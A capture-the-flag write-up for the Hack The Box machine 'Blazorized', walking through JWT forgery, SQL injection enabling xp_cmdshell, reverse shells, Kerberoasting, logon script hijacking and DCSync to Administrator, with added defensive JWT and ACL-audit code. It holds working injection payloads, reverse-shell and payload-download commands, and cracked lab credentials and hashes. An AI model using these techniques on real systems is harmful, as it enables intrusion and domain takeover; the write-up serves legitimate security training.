Hack The Box / WINDOWS / 2026-03-27

Hack The Box — Blazorized (Windows)

JWT signing key recovered from a client-side DLL, SQL injection used to enable xp_cmdshell for a foothold, an AD abuse chain via WriteSPN and logon script path manipulation, then DCSync to Administrator.

Target

  • IP: 10.129.25.120

Recon

sudo nmap -sC -sV 10.129.25.120 -p- -v
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 19:14:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49705/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
62014/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerate vhosts:

gobuster vhost -u 'http://blazorized.htb/' -w /home/kali/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 50 --append-domain
Found: api.blazorized.htb Status: 404 [Size: 0]
Found: admin.blazorized.htb Status: 200 [Size: 2072]

Go to http://admin.blazorized.htb. It is a super-admin panel with a login form, and we have no credentials.

JWT signing key extraction from DLL

Go to http://blazorized.htb/check-updates. Open DevTools -> Network, download Blazorized.Helpers.dll and open it in dnSpy.

We find:

        // Token: 0x04000005 RID: 5
        private const long EXPIRATION_DURATION_IN_SECONDS = 60L;

        // Token: 0x04000006 RID: 6
        private static readonly string jwtSymmetricSecurityKey = "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";

        // Token: 0x04000007 RID: 7
        private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";

        // Token: 0x04000008 RID: 8
        private static readonly string postsPermissionsClaimValue = "Posts_Get_All";

        // Token: 0x04000009 RID: 9
        private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";

        // Token: 0x0400000A RID: 10
        private static readonly string superAdminRoleClaimValue = "Super_Admin";

        // Token: 0x0400000B RID: 11
        private static readonly string issuer = "http://api.blazorized.htb";

        // Token: 0x0400000C RID: 12
        private static readonly string apiAudience = "http://api.blazorized.htb";

        // Token: 0x0400000D RID: 13
        private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";

Both GenerateTemporaryJWT and GenerateSuperAdminJWT sign with this same symmetric key, so anyone holding the DLL can mint tokens the server accepts.

Generate a super admin JWT. See helper script in attachments:

  • attachments/generate_super_admin_jwt.py

Copy the generated JWT and, in the browser's local storage, set the key jwt to that value. The super admin panel is now accessible.
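The verifier side of what the decompiled constants imply, as an added example that is not part of the writeup or the Blazorized project: a stdlib HS256 mint/verify pair showing that any holder of the symmetric key (here a constructed placeholder) produces tokens the server cannot tell from its own, and what a strict verifier must still check (algorithm, issuer, audience, expiry). The `role` and `permissions` claim names are assumptions.

```python
import base64, hashlib, hmac, json

ISSUER = "http://api.blazorized.htb"
API_AUDIENCE = "http://api.blazorized.htb"
ADMIN_AUDIENCE = "http://admin.blazorized.htb"
EXPIRATION_DURATION_IN_SECONDS = 60
KEY = b"constructed-placeholder-not-the-real-key"   # stands in for the value embedded in the DLL

def _b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()
def _unb64u(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_jwt(claims: dict, key: bytes) -> str:
    # HS256: the secret that verifies also signs, so a DLL holder is indistinguishable from the issuer
    head = _b64u(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64u(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return f"{head}.{body}.{_b64u(sig)}"

def verify_jwt(token: str, key: bytes, audience: str, now: float):
    """Return the claims if the token is valid for `audience` at time `now`, otherwise None."""
    try:
        head, body, sig = token.split(".")
        header, claims, given = json.loads(_unb64u(head)), json.loads(_unb64u(body)), _unb64u(sig)
    except ValueError:                      # wrong segment count, bad base64 or bad JSON
        return None
    if not isinstance(header, dict) or not isinstance(claims, dict) or header.get("alg") != "HS256":
        return None                         # pin the algorithm: no "none", no key-confusion variants
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given):
        return None
    if claims.get("iss") != ISSUER or claims.get("aud") != audience:
        return None                         # an API-audience token must not unlock the admin dashboard
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        return None
    return claims

def demo(now: float = 1_700_000_000.0) -> dict:
    admin = sign_jwt({"iss": ISSUER, "aud": ADMIN_AUDIENCE, "role": "Super_Admin",
                      "exp": now + EXPIRATION_DURATION_IN_SECONDS}, KEY)
    api = sign_jwt({"iss": ISSUER, "aud": API_AUDIENCE, "permissions": ["Posts_Get_All"],
                    "exp": now + EXPIRATION_DURATION_IN_SECONDS}, KEY)
    return {
        "admin_token_accepted": verify_jwt(admin, KEY, ADMIN_AUDIENCE, now) is not None,
        "api_token_on_admin": verify_jwt(api, KEY, ADMIN_AUDIENCE, now) is not None,
        "after_61_seconds": verify_jwt(admin, KEY, ADMIN_AUDIENCE, now + 61) is not None,
        "other_key": verify_jwt(admin, b"other-key", ADMIN_AUDIENCE, now) is not None,
    }
```

The structural fix is asymmetric signing (RS256 or ES256) so that a client-delivered assembly carries only the public key; the audience check keeps a token minted for the API from being replayed against the admin dashboard.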

SQL injection and initial shell

Go to:

  • http://admin.blazorized.htb/check-duplicate-post-title

The form field here is vulnerable to SQL injection.

On the attacker side, listen for ICMP:

sudo tcpdump -i tun0 icmp

Inject into form field:

'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'ping 10.10.15.1' -- 

We get a pingback, confirming command execution.

Generate a PowerShell reverse shell (Base64, PowerShell 3) from revshells.com.

nc -vlnp 4444

Inject payload:

'; EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC master..xp_cmdshell 'powershell -e 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' -- 

We get a reverse shell as blazorized\NU_1055.

BloodHound and WriteSPN abuse

Upload and run SharpHound on the victim; it produces a zip file.

Attacker side:

impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)

Victim side:

net use \\10.10.15.1\share test12 /USER:test12
cp 20240702174454_BloodHound.zip \\10.10.15.1\share

In BloodHound, NU_1055 has WriteSPN over RSA_4810.

Upload PowerView.ps1 and import:

. .\PowerView.ps1
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser RSA_4810 -SPN | Get-DomainSPNTicket -Format Hashcat

Crack the ticket hash:

./hashcat-6.2.6/hashcat.bin ./hash ./rockyou.txt
./hashcat-6.2.6/hashcat.bin ./hash ./rockyou.txt --show

Recovered password:

  • (Ni7856Do9854Ki05Ng0005 #)

evil-winrm -i 10.10.11.22 -u 'RSA_4810' -p '(Ni7856Do9854Ki05Ng0005 #)'

Abuse logon script path and become SSA_6010

. .\PowerView.ps1
Get-NetUser

From the output, for SSA_6010 we see:

  • scriptpath : \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030
  • membership includes Super_Support_Administrators

Read the script and check its ACL:

type \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat
:: TO-DO: Notify LSA_3214 to write the logonScript for SSA_6010

Get-Acl \\dc1\NETLOGON\A2BFDCF13BB2\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030.bat | Format-List -Property *

AccessToString shows write permissions for BLAZORIZED\RSA_4810.

Useful references:

  • https://learn.microsoft.com/it-it/troubleshoot/windows-server/group-policy/rebuild-sysvol-tree-and-content-in-a-domain
  • https://learn.microsoft.com/en-us/troubleshoot/windows-server/user-profiles-and-logon/assign-logon-script-profile-local-user

Create rev.bat containing the Base64 PowerShell reverse shell. On the victim, check the scripts folder's permissions and place the file there:

cd C:\Windows\SYSVOL\sysvol\blazorized.htb\scripts
# or
cd C:\Windows\SYSVOL\domain\scripts

icacls A32FF3AEAA23
BLAZORIZED\RSA_4810:(OI)(CI)(RX,W)

cd A32FF3AEAA23
curl http://10.10.16.36/rev.bat -o rev.bat

Attacker:

nc -vlnp 4444

Victim:

Set-AdUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\rev.bat'

After a short wait we get a reverse shell as SSA_6010.
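A defender's check for the condition this step relied on, added here and not part of the writeup: parse icacls output for a NETLOGON scripts folder and flag allow-ACEs that give a non-administrative principal write-capable rights. The sample output is constructed around the single ACE line shown above, and the trusted-principal allowlist is an assumption to adjust per domain.

```python
import re

# icacls simple and specific rights that allow creating, altering, deleting or replacing content.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC", "WDAC", "WO", "GA", "GW"}

# Principals expected to hold write rights on NETLOGON; an assumption to adjust per domain.
TRUSTED = frozenset({"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators", "CREATOR OWNER",
                     "BLAZORIZED\\Domain Admins", "BLAZORIZED\\Enterprise Admins"})

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([^)]*\))+)\s*$")

def parse_icacls(output: str):
    """Yield (principal, inherit_flags, rights, is_deny) for every ACE line of icacls output."""
    for line in output.splitlines():
        if not line.strip():
            continue
        # icacls prints the path only on the first line; continuation lines are indented.
        rest = line.strip() if line[:1].isspace() else line.split(None, 1)[-1]
        m = ACE_RE.match(rest)
        if not m:
            continue                                   # e.g. the "Successfully processed" summary
        groups = re.findall(r"\(([^)]*)\)", m.group("flags"))
        rights, inherit = groups[-1], [g for g in groups[:-1] if g != "DENY"]
        yield m.group("principal").strip(), inherit, rights, "DENY" in groups

def find_risky_aces(output: str, trusted=TRUSTED):
    """Allow-ACEs that give a principal outside `trusted` any write-capable right."""
    risky = []
    for principal, _inherit, rights, is_deny in parse_icacls(output):
        if is_deny or principal in trusted:
            continue
        if set(rights.split(",")) & WRITE_RIGHTS:
            risky.append((principal, rights))
    return risky

# Constructed sample, modelled on the single ACE line shown in the writeup.
SAMPLE = """\
A32FF3AEAA23 BLAZORIZED\\RSA_4810:(OI)(CI)(RX,W)
             NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
             BUILTIN\\Administrators:(OI)(CI)(F)
             BUILTIN\\Users:(OI)(CI)(RX)
             NT AUTHORITY\\Authenticated Users:(DENY)(W)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for principal, rights in find_risky_aces(SAMPLE):
        print(f"RISK: {principal} can modify logon scripts ({rights})")
```

Run the same check over every folder under NETLOGON referenced by a user's scriptPath; a hit means whoever holds that principal can replace a script that executes in the target user's logon session.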

DCSync to Administrator

Run SharpHound again as SSA_6010 and export the zip.

Attacker:

impacket-smbserver -smb2support -username test12 -password test12 share $(pwd)

Victim:

net use \\10.10.16.36\share test12 /USER:test12
cp 20240704101237_BloodHound.zip \\10.10.16.36\share\bloodhound.zip

In BloodHound, SSA_6010 has DCSync rights on blazorized.htb.

Upload mimikatz and run:

.\mimikatz.exe
lsadump::dcsync /domain:blazorized.htb /user:Administrator

Get the NTLM hash:

  • f55ed1465179ba374ec1cad05b34a5f3

evil-winrm -i 10.10.11.22 -u 'Administrator' -H 'f55ed1465179ba374ec1cad05b34a5f3'

We get a shell as Administrator.